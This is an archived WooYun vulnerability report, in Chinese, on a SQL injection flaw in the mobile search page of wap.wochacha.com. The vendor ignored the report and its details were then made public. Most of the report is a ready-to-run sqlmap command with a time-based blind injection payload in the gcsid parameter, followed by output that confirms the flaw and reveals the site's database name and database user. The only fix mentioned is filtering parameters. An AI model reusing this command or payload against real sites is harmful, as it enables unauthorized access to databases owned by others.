乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开
http://wap.wochacha.com
sqlmap.py -u "http://wap.wochacha.com/search/all?brand=%E7%88%B1%E8%BD%A6%E5%B1%8B&clid=1053&gcsid=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&query=%E7%88%B1%E8%BD%A6%E5%B1%8B" --dbms=mysql --current-db --time-sec=10
sqlmap resumed the following injection point(s) from stored session:---Parameter: #2* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://wap.wochacha.com:80/search/all?brand=%E7%88%B1%E8%BD%A6%E5%B1%8B&clid=1053&gcsid=if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"' AND (SELECT * FROM (SELECT(SLEEP(10)))yPMQ) AND 'XlCc'='XlCc/&query=%E7%88%B1%E8%BD%A6%E5%B1%8B---web application technology: PHP 5.3.6back-end DBMS: MySQL >= 5.0.0current database: 'security'sqlmap resumed the following injection point(s) from stored session:---Parameter: #2* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://wap.wochacha.com:80/search/all?brand=%E7%88%B1%E8%BD%A6%E5%B1%8B&clid=1053&gcsid=if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"' AND (SELECT * FROM (SELECT(SLEEP(10)))yPMQ) AND 'XlCc'='XlCc/&query=%E7%88%B1%E8%BD%A6%E5%B1%8B---web application technology: PHP 5.3.6back-end DBMS: MySQL >= 5.0.0current user: '[email protected]'
过滤相关参数
危害等级:无影响厂商忽略
忽略时间:2015-11-28 15:52
漏洞Rank:4 (WooYun评价)
暂无
